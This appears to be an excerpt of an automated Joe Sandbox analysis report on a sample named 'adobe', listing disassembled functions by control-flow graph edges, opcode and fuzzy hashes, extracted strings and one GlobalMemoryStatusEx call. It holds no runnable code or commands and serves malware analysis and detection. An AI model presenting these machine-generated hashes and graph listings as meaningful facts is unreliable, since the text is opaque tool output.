                                                  • Opcode ID: 81a4af8f87bf7e7cd4d2aa4aa37486ed36958a926751c390c3a41a48c00a0213
                                                  • Instruction ID: d5f5205ec239112f32be7e0d8dcd3a14e2bf065e98fb2b35b603a6bf2954fd28
                                                  • Opcode Fuzzy Hash: 81a4af8f87bf7e7cd4d2aa4aa37486ed36958a926751c390c3a41a48c00a0213
                                                  • Instruction Fuzzy Hash: B422A330E002098FDF64DF68D4A07BDB7B6EB49710F2188A6E805DB395DA75DC81CBA1
                                                  Function 0675AD18 Relevance: 10.4, Strings: 8, Instructions: 391COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 675ad18-675ad36 1 675ad38-675ad3b 0->1 2 675ad55-675ad58 1->2 3 675ad3d-675ad46 1->3 6 675ad6c-675ad6f 2->6 7 675ad5a-675ad67 2->7 4 675ad4c-675ad50 3->4 5 675af4f-675af86 3->5 4->2 15 675af88-675af8b 5->15 8 675ad71-675ad76 6->8 9 675ad79-675ad7c 6->9 7->6 8->9 12 675af35-675af3e 9->12 13 675ad82-675ad85 9->13 12->3 14 675af44-675af4e 12->14 16 675ad87-675ad8b 13->16 17 675ad96-675ad99 13->17 21 675af8d-675afa9 15->21 22 675afae-675afb1 15->22 16->14 18 675ad91 16->18 19 675adbc-675adbf 17->19 20 675ad9b-675adb7 17->20 18->17 25 675adc1-675add4 19->25 26 675add9-675addc 19->26 20->19 21->22 23 675afb3-675afbd 22->23 24 675afbe-675afc1 22->24 29 675afd0-675afd3 24->29 30 675afc3 call 675b26f 24->30 25->26 31 675adec-675adee 26->31 32 675adde-675ade7 26->32 33 675b23c-675b23f 29->33 34 675afd9-675b014 29->34 43 675afc9-675afcb 30->43 36 675adf5-675adf8 31->36 37 675adf0 31->37 32->31 39 675b241-675b245 33->39 40 675b250-675b252 33->40 50 675b207-675b21a 34->50 51 675b01a-675b026 34->51 36->1 38 675adfe-675ae22 36->38 37->36 55 675af32 38->55 56 675ae28-675ae37 38->56 39->34 44 675b24b 39->44 45 675b254 40->45 46 675b259-675b25c 40->46 43->29 44->40 45->46 46->15 49 675b262-675b26c 46->49 52 675b21c 50->52 57 675b046-675b08a 51->57 58 675b028-675b041 51->58 52->33 55->12 61 675ae4f-675ae8a call 67565e8 56->61 62 675ae39-675ae3f 56->62 74 675b0a6-675b0e5 57->74 75 675b08c-675b09e 57->75 58->52 81 675aea2-675aeb9 61->81 82 675ae8c-675ae92 61->82 64 675ae41 62->64 65 675ae43-675ae45 62->65 64->61 65->61 79 675b1cc-675b1e1 74->79 80 675b0eb-675b1c6 call 67565e8 74->80 75->74 79->50 80->79 92 675aed1-675aee2 81->92 93 675aebb-675aec1 81->93 83 675ae94 82->83 84 675ae96-675ae98 82->84 83->81 84->81 98 675aee4-675aeea 92->98 99 675aefa-675af2b 92->99 94 675aec5-675aec7 93->94 95 675aec3 93->95 94->92 95->92 101 675aeec 98->101 102 675aeee-675aef0 98->102 99->55 101->99 102->99
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4499943228.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6750000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                  • API String ID: 0-1273862796
                                                  • Opcode ID: d1e159f7d6bf8628421cff6deed0be3d90346546f54d53a1477b31f70cd2eb03
                                                  • Instruction ID: af24fe2a7240cf22458e332ce838b60a384ed69cd658b8acc9ec90be7231c399
                                                  • Opcode Fuzzy Hash: d1e159f7d6bf8628421cff6deed0be3d90346546f54d53a1477b31f70cd2eb03
                                                  • Instruction Fuzzy Hash: D7E19130E102098FDB68DF68D4906AEB7B6EF85300F218679D809EB395DB75DC46CB91
                                                  Function 0675B6A0 Relevance: 8.0, Strings: 6, Instructions: 468COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 253 675b6a0-675b6c0 254 675b6c2-675b6c5 253->254 255 675b6c7-675b6cb 254->255 256 675b6ec-675b6ef 254->256 259 675b6d1-675b6e1 255->259 260 675ba3f-675ba76 255->260 257 675b6f1-675b6f7 256->257 258 675b6fc-675b6ff 256->258 257->258 261 675b701-675b716 258->261 262 675b73e-675b741 258->262 267 675b954-675b958 259->267 268 675b6e7 259->268 270 675ba78-675ba7b 260->270 261->260 276 675b71c-675b739 261->276 265 675b743-675b748 262->265 266 675b74b-675b74e 262->266 265->266 271 675b750-675b759 266->271 272 675b75e-675b761 266->272 267->260 275 675b95e-675b96e 267->275 268->256 277 675ba7d-675ba99 270->277 278 675ba9e-675baa1 270->278 271->272 273 675b763-675b76c 272->273 274 675b77e-675b781 272->274 273->260 281 675b772-675b779 273->281 282 675b795-675b798 274->282 283 675b783-675b787 274->283 297 675b997-675b99b 275->297 298 675b970 275->298 276->262 277->278 279 675baa7-675bacf 278->279 280 675bd0d-675bd0f 278->280 337 675bad1-675bad4 279->337 338 675bad9-675bb1d 279->338 290 675bd16-675bd19 280->290 291 675bd11 280->291 281->274 285 675b7af-675b7b2 282->285 286 675b79a-675b79e 282->286 283->260 284 675b78d-675b790 283->284 284->282 295 675b86d-675b870 285->295 296 675b7b8-675b7bb 285->296 286->260 294 675b7a4-675b7aa 286->294 290->270 292 675bd1f-675bd28 290->292 291->290 294->285 300 675b875-675b878 295->300 301 675b846-675b84f 296->301 302 675b7c1-675b7c4 296->302 297->260 299 675b9a1-675b9b1 297->299 303 675b975-675b978 298->303 299->295 325 675b9b7 299->325 305 675b89b-675b89e 300->305 306 675b87a-675b896 300->306 312 675b855 301->312 313 675b9c1-675b9ca 301->313 308 675b7e6-675b7e9 302->308 309 675b7c6-675b7e1 302->309 310 675b982-675b985 303->310 311 675b97a-675b97d 303->311 318 675b8b0-675b8b3 305->318 319 675b8a0-675b8ab 305->319 306->305 314 675b800-675b803 308->314 315 675b7eb-675b7ef 308->315 309->308 320 675b987-675b98d 310->320 321 675b992-675b995 310->321 311->310 322 675b85a-675b85d 312->322 313->260 317 675b9cc-675b9d3 313->317 326 675b805-675b81a 314->326 327 675b841-675b844 314->327 315->260 324 675b7f5-675b7fb 315->324 330 675b9d8-675b9db 317->330 331 675b8b5-675b8b9 318->331 332 675b8c4-675b8c7 318->332 319->318 320->321 321->297 323 675b9bc-675b9bf 321->323 322->295 334 675b85f-675b862 322->334 323->313 323->330 324->314 325->323 326->260 353 675b820-675b83c 326->353 327->301 327->322 339 675b9ed-675b9f0 330->339 340 675b9dd 330->340 331->271 344 675b8bf 331->344 335 675b91c-675b91f 332->335 336 675b8c9-675b917 call 67565e8 332->336 341 675b868-675b86b 334->341 342 675b9fb-675ba04 334->342 349 675b921-675b92a 335->349 350 675b92f-675b932 335->350 336->335 337->292 372 675bb23-675bb2c 338->372 373 675bd02-675bd0c 338->373 339->295 347 675b9f6-675b9f9 339->347 355 675b9e5-675b9e8 340->355 341->295 341->300 342->273 348 675ba0a 342->348 344->332 347->342 356 675ba0f-675ba12 347->356 348->356 349->350 357 675b934-675b93d 350->357 358 675b942-675b945 350->358 353->327 355->339 360 675ba14-675ba1d 356->360 361 675ba22-675ba24 356->361 357->358 362 675b947-675b94c 358->362 363 675b94f-675b952 358->363 360->361 367 675ba26 361->367 368 675ba2b-675ba2e 361->368 362->363 363->267 363->303 367->368 368->254 369 675ba34-675ba3e 368->369 375 675bb32-675bb9e call 67565e8 372->375 376 675bcf8-675bcfd 372->376 387 675bba4-675bba9 375->387 388 675bc98-675bcad 375->388 376->373 390 675bbc5 387->390 391 675bbab-675bbb1 387->391 388->376 392 675bbc7-675bbcd 390->392 393 675bbb7-675bbb9 391->393 394 675bbb3-675bbb5 391->394 395 675bbe2-675bbef 392->395 396 675bbcf-675bbd5 392->396 397 675bbc3 393->397 394->397 404 675bc07-675bc14 395->404 405 675bbf1-675bbf7 395->405 398 675bc83-675bc92 396->398 399 675bbdb 396->399 397->392 398->387 398->388 399->395 400 675bc16-675bc23 399->400 401 675bc4a-675bc57 399->401 411 675bc25-675bc2b 400->411 412 675bc3b-675bc48 400->412 413 675bc6f-675bc7c 401->413 414 675bc59-675bc5f 401->414 404->398 406 675bbf9 405->406 407 675bbfb-675bbfd 405->407 406->404 407->404 415 675bc2d 411->415 416 675bc2f-675bc31 411->416 412->398 413->398 417 675bc61 414->417 418 675bc63-675bc65 414->418 415->412 416->412 417->413 418->413
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4499943228.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6750000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $]q$$]q$$]q$$]q$$]q$$]q
                                                  • API String ID: 0-3723351465
                                                  • Opcode ID: 75484d74c1b7de41988127e0cb725e6888c87deea19eac50e78c94cb2c832660
                                                  • Instruction ID: ced95db8456a5506bbec9074c8e15f4b9d02ff7689072ad2282dd1a3f58740f2
                                                  • Opcode Fuzzy Hash: 75484d74c1b7de41988127e0cb725e6888c87deea19eac50e78c94cb2c832660
                                                  • Instruction Fuzzy Hash: 5A029E30E002098FDFA4DF68D4A06BDB7B2EF45700F2585A6D805EB255DBB5EC45CB91
                                                  Function 06759198 Relevance: 5.2, Strings: 4, Instructions: 230COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 421 6759198-67591bd 422 67591bf-67591c2 421->422 423 6759a80-6759a83 422->423 424 67591c8-67591dd 422->424 425 6759a85-6759aa4 423->425 426 6759aa9-6759aab 423->426 431 67591f5-675920b 424->431 432 67591df-67591e5 424->432 425->426 428 6759ab2-6759ab5 426->428 429 6759aad 426->429 428->422 433 6759abb-6759ac5 428->433 429->428 438 6759216-6759218 431->438 434 67591e7 432->434 435 67591e9-67591eb 432->435 434->431 435->431 439 6759230-67592a1 438->439 440 675921a-6759220 438->440 451 67592a3-67592c6 439->451 452 67592cd-67592e9 439->452 441 6759224-6759226 440->441 442 6759222 440->442 441->439 442->439 451->452 457 6759315-6759330 452->457 458 67592eb-675930e 452->458 463 6759332-6759354 457->463 464 675935b-6759376 457->464 458->457 463->464 469 6759378-6759394 464->469 470 675939b-67593a9 464->470 469->470 471 67593b9-6759433 470->471 472 67593ab-67593b4 470->472 478 6759435-6759453 471->478 479 6759480-6759495 471->479 472->433 483 6759455-6759464 478->483 484 675946f-675947e 478->484 479->423 483->484 484->478 484->479
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4499943228.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6750000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $]q$$]q$$]q$$]q
                                                  • API String ID: 0-858218434
                                                  • Opcode ID: 3188e0b9f9037e3ed28062299fe1f864fada6cc0c7860e89e0e3ff1c60958cd0
                                                  • Instruction ID: 99e2dafa3596a39188137a74c150773c3c6740c852438c4624608f06bb25c43e
                                                  • Opcode Fuzzy Hash: 3188e0b9f9037e3ed28062299fe1f864fada6cc0c7860e89e0e3ff1c60958cd0
                                                  • Instruction Fuzzy Hash: CA916F31B0061A9FDB54DF75D850BAEB3F6EF84204F2085A9D90DEB348EA709D468B91
                                                  Function 0675CFA0 Relevance: 4.5, Strings: 3, Instructions: 799COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 487 675cfa0-675cfbb 488 675cfbd-675cfc0 487->488 489 675cfc2-675d004 488->489 490 675d009-675d00c 488->490 489->490 491 675d055-675d058 490->491 492 675d00e-675d050 490->492 494 675d075-675d078 491->494 495 675d05a-675d070 491->495 492->491 497 675d0c1-675d0c4 494->497 498 675d07a-675d089 494->498 495->494 503 675d0c6-675d108 497->503 504 675d10d-675d110 497->504 500 675d098-675d0a4 498->500 501 675d08b-675d090 498->501 506 675d9bd-675d9d0 500->506 507 675d0aa-675d0bc 500->507 501->500 503->504 508 675d112-675d154 504->508 509 675d159-675d15c 504->509 525 675d9d2-675d9dd 506->525 526 675d9de-675d9f6 506->526 507->497 508->509 511 675d162-675d165 509->511 512 675d48c-675d498 509->512 517 675d167-675d1a9 511->517 518 675d1ae-675d1b1 511->518 512->498 516 675d49e-675d78b 512->516 702 675d791-675d797 516->702 703 675d9b2-675d9bc 516->703 517->518 523 675d1b3-675d1b8 518->523 524 675d1bb-675d1be 518->524 523->524 528 675d207-675d20a 524->528 529 675d1c0-675d1cf 524->529 525->526 530 675d9f8-675d9fb 526->530 541 675d253-675d256 528->541 542 675d20c-675d24e 528->542 537 675d1d1-675d1d6 529->537 538 675d1de-675d1ea 529->538 539 675d9fd call 675db15 530->539 540 675da0a-675da0d 530->540 537->538 538->506 544 675d1f0-675d202 538->544 552 675da03-675da05 539->552 547 675da30-675da33 540->547 548 675da0f-675da2b 540->548 545 675d279-675d27c 541->545 546 675d258-675d274 541->546 542->541 544->528 553 675d27e-675d280 545->553 554 675d28b-675d28e 545->554 546->545 555 675da35-675da61 547->555 556 675da66-675da68 547->556 548->547 552->540 564 675d347-675d350 553->564 565 675d286 553->565 566 675d2d7-675d2da 554->566 567 675d290-675d2d2 554->567 555->556 568 675da6f-675da72 556->568 569 675da6a 556->569 572 675d352-675d357 564->572 573 675d35f-675d36b 564->573 565->554 576 675d2dc-675d2de 566->576 577 675d2e9-675d2ec 566->577 567->566 568->530 574 675da74-675da83 568->574 569->568 572->573 585 675d371-675d385 573->585 586 675d47c-675d481 573->586 599 675da85-675dae8 call 67565e8 574->599 600 675daea-675daff 574->600 588 675d2e4 576->588 589 675d489 576->589 578 675d335-675d337 577->578 579 675d2ee-675d330 577->579 591 675d33e-675d341 578->591 592 675d339 578->592 579->578 585->589 604 675d38b-675d39d 585->604 586->589 588->577 589->512 591->488 591->564 592->591 599->600 610 675db00 600->610 615 675d3c1-675d3c3 604->615 616 675d39f-675d3a5 604->616 610->610 621 675d3cd-675d3d9 615->621 619 675d3a7 616->619 620 675d3a9-675d3b5 616->620 624 675d3b7-675d3bf 619->624 620->624 633 675d3e7 621->633 634 675d3db-675d3e5 621->634 624->621 636 675d3ec-675d3ee 633->636 634->636 636->589 638 675d3f4-675d410 call 67565e8 636->638 647 675d412-675d417 638->647 648 675d41f-675d42b 638->648 647->648 648->586 650 675d42d-675d47a 648->650 650->589 704 675d7a6-675d7af 702->704 705 675d799-675d79e 702->705 704->506 706 675d7b5-675d7c8 704->706 705->704 708 675d9a2-675d9ac 706->708 709 675d7ce-675d7d4 706->709 708->702 708->703 710 675d7d6-675d7db 709->710 711 675d7e3-675d7ec 709->711 710->711 711->506 712 675d7f2-675d813 711->712 715 675d815-675d81a 712->715 716 675d822-675d82b 712->716 715->716 716->506 717 675d831-675d84e 716->717 717->708 720 675d854-675d85a 717->720 720->506 721 675d860-675d879 720->721 723 675d995-675d99c 721->723 724 675d87f-675d8a6 721->724 723->708 723->720 724->506 727 675d8ac-675d8b6 724->727 727->506 728 675d8bc-675d8d3 727->728 730 675d8d5-675d8e0 728->730 731 675d8e2-675d8fd 728->731 730->731 731->723 736 675d903-675d91c call 67565e8 731->736 740 675d91e-675d923 736->740 741 675d92b-675d934 736->741 740->741 741->506 742 675d93a-675d98e 741->742 742->723
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4499943228.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6750000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $]q$$]q$$]q
                                                  • API String ID: 0-182748909
                                                  • Opcode ID: 9957e59c4ba6084b2e7f6e3059a629308d72b4fdfe4751b647719de33ca32c89
                                                  • Instruction ID: 39a2e19f9d789272a6f1dc990f602db8c38b37c7475475f5bbc78fd15c3131a7
                                                  • Opcode Fuzzy Hash: 9957e59c4ba6084b2e7f6e3059a629308d72b4fdfe4751b647719de33ca32c89
                                                  • Instruction Fuzzy Hash: 0462923060060A8FCB55EF68E580A5EB7F6FF85304F258AA9D4059F369DB75EC46CB80
                                                  Function 06754BB0 Relevance: 3.9, Strings: 3, Instructions: 186COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 750 6754bb0-6754bd4 751 6754bd6-6754bd9 750->751 752 6754bdb-6754bf5 751->752 753 6754bfa-6754bfd 751->753 752->753 754 6754c03-6754cfb 753->754 755 67552dc-67552de 753->755 773 6754d01-6754d4e call 675545a 754->773 774 6754d7e-6754d85 754->774 756 67552e5-67552e8 755->756 757 67552e0 755->757 756->751 759 67552ee-67552fb 756->759 757->756 787 6754d54-6754d70 773->787 775 6754e09-6754e12 774->775 776 6754d8b-6754dfb 774->776 775->759 793 6754e06 776->793 794 6754dfd 776->794 790 6754d72 787->790 791 6754d7b 787->791 790->791 791->774 793->775 794->793
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4499943228.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6750000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: fbq$XPbq$\Obq
                                                  • API String ID: 0-4057264190
                                                  • Opcode ID: 4704bb1678e94c0cb11ca9c968440364228daa2b248ed454353554e520f27917
                                                  • Instruction ID: e7325c590b2647c75bac449ccea0b40ef252d51f67279d01e4364b08a9bbf738
                                                  • Opcode Fuzzy Hash: 4704bb1678e94c0cb11ca9c968440364228daa2b248ed454353554e520f27917
                                                  • Instruction Fuzzy Hash: 8E618230F002099FEB549FA9C8547AEBBF6FF89700F208469E506EB395DB758C418B95
                                                  Function 06759188 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1561 6759188-67591bd 1562 67591bf-67591c2 1561->1562 1563 6759a80-6759a83 1562->1563 1564 67591c8-67591dd 1562->1564 1565 6759a85-6759aa4 1563->1565 1566 6759aa9-6759aab 1563->1566 1571 67591f5-675920b 1564->1571 1572 67591df-67591e5 1564->1572 1565->1566 1568 6759ab2-6759ab5 1566->1568 1569 6759aad 1566->1569 1568->1562 1573 6759abb-6759ac5 1568->1573 1569->1568 1578 6759216-6759218 1571->1578 1574 67591e7 1572->1574 1575 67591e9-67591eb 1572->1575 1574->1571 1575->1571 1579 6759230-67592a1 1578->1579 1580 675921a-6759220 1578->1580 1591 67592a3-67592c6 1579->1591 1592 67592cd-67592e9 1579->1592 1581 6759224-6759226 1580->1581 1582 6759222 1580->1582 1581->1579 1582->1579 1591->1592 1597 6759315-6759330 1592->1597 1598 67592eb-675930e 1592->1598 1603 6759332-6759354 1597->1603 1604 675935b-6759376 1597->1604 1598->1597 1603->1604 1609 6759378-6759394 1604->1609 1610 675939b-67593a9 1604->1610 1609->1610 1611 67593b9-6759433 1610->1611 1612 67593ab-67593b4 1610->1612 1618 6759435-6759453 1611->1618 1619 6759480-6759495 1611->1619 1612->1573 1623 6759455-6759464 1618->1623 1624 675946f-675947e 1618->1624 1619->1563 1623->1624 1624->1618 1624->1619
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4499943228.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6750000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $]q$$]q
                                                  • API String ID: 0-127220927
                                                  • Opcode ID: 70c1e24ee5ed5abcd5de14aab6d75a68ab077438842630b86952055cb8bc7cae
                                                  • Instruction ID: 01a85a842aed1a194644893000dff9177c3dc2ba626e16bead81d47985e784f1
                                                  • Opcode Fuzzy Hash: 70c1e24ee5ed5abcd5de14aab6d75a68ab077438842630b86952055cb8bc7cae
                                                  • Instruction Fuzzy Hash: 76514E31B00505DFDB54DB78D890BAE73F6EB88604F1085A9D90DDB398EA71DC068B92
                                                  Function 06754BA0 Relevance: 2.6, Strings: 2, Instructions: 141COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1627 6754ba0-6754bd4 1629 6754bd6-6754bd9 1627->1629 1630 6754bdb-6754bf5 1629->1630 1631 6754bfa-6754bfd 1629->1631 1630->1631 1632 6754c03-6754cfb 1631->1632 1633 67552dc-67552de 1631->1633 1651 6754d01-6754d4e call 675545a 1632->1651 1652 6754d7e-6754d85 1632->1652 1634 67552e5-67552e8 1633->1634 1635 67552e0 1633->1635 1634->1629 1637 67552ee-67552fb 1634->1637 1635->1634 1665 6754d54-6754d70 1651->1665 1653 6754e09-6754e12 1652->1653 1654 6754d8b-6754dfb 1652->1654 1653->1637 1671 6754e06 1654->1671 1672 6754dfd 1654->1672 1668 6754d72 1665->1668 1669 6754d7b 1665->1669 1668->1669 1669->1652 1671->1653 1672->1671
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4499943228.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6750000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: fbq$XPbq
                                                  • API String ID: 0-2292610095
                                                  • Opcode ID: 062c366c01637271b4bd558bd44ce50d88c63b19919661a36fc61596d58457ec
                                                  • Instruction ID: eff16be97aaa4733280f74e3b40ecef46c56b81b31def376a4b4ad17c3e96e20
                                                  • Opcode Fuzzy Hash: 062c366c01637271b4bd558bd44ce50d88c63b19919661a36fc61596d58457ec
                                                  • Instruction Fuzzy Hash: 74517430F002199FEB54DFA5C854BAEBBF6FF89700F208529E506AB395DA758C418B91
                                                  Function 00E0ED40 Relevance: 1.6, APIs: 1, Instructions: 136COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1953 e0ed40-e0ed5b 1954 e0ed85-e0ed9b 1953->1954 1955 e0ed5d-e0ed84 1953->1955 1975 e0ed9d call e0ed40 1954->1975 1976 e0ed9d call e0ee28 1954->1976 1958 e0eda2-e0eda4 1959 e0eda6-e0eda9 1958->1959 1960 e0edaa-e0ee09 1958->1960 1967 e0ee0b-e0ee0e 1960->1967 1968 e0ee0f-e0ee9c GlobalMemoryStatusEx 1960->1968 1971 e0eea5-e0eecd 1968->1971 1972 e0ee9e-e0eea4 1968->1972 1972->1971 1975->1958 1976->1958
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4485716651.0000000000E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_e00000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1fcd8f3fac4b8b0c469b1bf1c4bce24c632e7c0b2df9748b0b3dea57e7dab027
                                                  • Instruction ID: ba7cefe0c19f1710371c995e11798b26b146fdd22c1b72a4bc615ceb7af5a873
                                                  • Opcode Fuzzy Hash: 1fcd8f3fac4b8b0c469b1bf1c4bce24c632e7c0b2df9748b0b3dea57e7dab027
                                                  • Instruction Fuzzy Hash: C6412471E047498FC714DF79D8442EEBBF1EF89310F15866AD408A7291DB789886CBD1
                                                  Function 00E0EE28 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1977 e0ee28-e0ee9c GlobalMemoryStatusEx 1979 e0eea5-e0eecd 1977->1979 1980 e0ee9e-e0eea4 1977->1980 1980->1979
                                                  APIs
                                                  • GlobalMemoryStatusEx.KERNEL32 ref: 00E0EE8F
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4485716651.0000000000E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_e00000_adobe.jbxd
                                                  Similarity
                                                  • API ID: GlobalMemoryStatus
                                                  • String ID:
                                                  • API String ID: 1890195054-0
                                                  • Opcode ID: a101e664506230791293955a49fe81d54100fcbedbc34f2871252770297944bc
                                                  • Instruction ID: be45ed1b8128d4529d3465bbab88ffd6fbe55769d02b6f56bca8f9b34b4d06ff
                                                  • Opcode Fuzzy Hash: a101e664506230791293955a49fe81d54100fcbedbc34f2871252770297944bc
                                                  • Instruction Fuzzy Hash: EC11EFB1C0065A9BCB10DFAAC544B9EFBF8AF48320F15856AD818B7240D778A944CFA5
                                                  Function 0675DB15 Relevance: 1.4, Strings: 1, Instructions: 124COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4499943228.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6750000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: PH]q
                                                  • API String ID: 0-3168235125
                                                  • Opcode ID: 98891d19d386ffec191c7933df3517966d9a877bef5923d8bb04a9991876bab7
                                                  • Instruction ID: e972cf276e9bcc38063f88ea3c7cf73b987217f8c05f3d2eed0bca4108daf3c7
                                                  • Opcode Fuzzy Hash: 98891d19d386ffec191c7933df3517966d9a877bef5923d8bb04a9991876bab7
                                                  • Instruction Fuzzy Hash: 8841C030E0070ACFDB64DF64D8546AEBBB2FF85300F218569E805E7350EBB49946CB95
                                                  Function 067521ED Relevance: 1.4, Strings: 1, Instructions: 108COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4499943228.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6750000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: PH]q
                                                  • API String ID: 0-3168235125
                                                  • Opcode ID: 6fe30d9262d5c2233a8aed61190c68a3f62b6421f5518a76f93bfca07dfcd366
                                                  • Instruction ID: f385d1dcf9f1e0660bb8c21dbd120e49604806ef4f1b0cba490199ea1994b83a
                                                  • Opcode Fuzzy Hash: 6fe30d9262d5c2233a8aed61190c68a3f62b6421f5518a76f93bfca07dfcd366
                                                  • Instruction Fuzzy Hash: C031F531B102018FDB499B74D45466E7BA3EF85300F1544A8D406DB396EE75CE06C7A5
                                                  Function 06752200 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4499943228.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6750000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: PH]q
                                                  • API String ID: 0-3168235125
                                                  • Opcode ID: d8cb8a44cd29e1dd0b65ce553a18322febe3d2b4e9c72c532ff9736f835a8413
                                                  • Instruction ID: 102a141a5a56506ee9fa9a277c428863a0037730e92025e5645e945e94da90de
                                                  • Opcode Fuzzy Hash: d8cb8a44cd29e1dd0b65ce553a18322febe3d2b4e9c72c532ff9736f835a8413
                                                  • Instruction Fuzzy Hash: DF31C330B102068FDB589B74D514A6E7BE7EF89300F228478D806DB395EE75DE06C7A5
                                                  Function 06754A99 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4499943228.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6750000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: \Obq
                                                  • API String ID: 0-2878401908
                                                  • Opcode ID: 0b010db63069a197150f17606389cb6e8a558453d297f1af746a6dce848e74a0
                                                  • Instruction ID: 5a4d016587a355b1e1b42a703ee1ab6d46139d7108965d440ec74a44a16ef768
                                                  • Opcode Fuzzy Hash: 0b010db63069a197150f17606389cb6e8a558453d297f1af746a6dce848e74a0
                                                  • Instruction Fuzzy Hash: 4EF0FE71A50129DFDB54DF94E959BAE7BB2FF84705F204119E402A7294CBB41C41CF90
                                                  Function 06756230 Relevance: .2, Instructions: 229COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4499943228.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6750000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a9d5d5814fe77f1583dcd9c67de5bc69789210d9d8f575a242bf2b9a57b24072
                                                  • Instruction ID: 893d47425b7ad020197e08f1ceda83191fd2be08ca22a07c8518e0d7db52a689
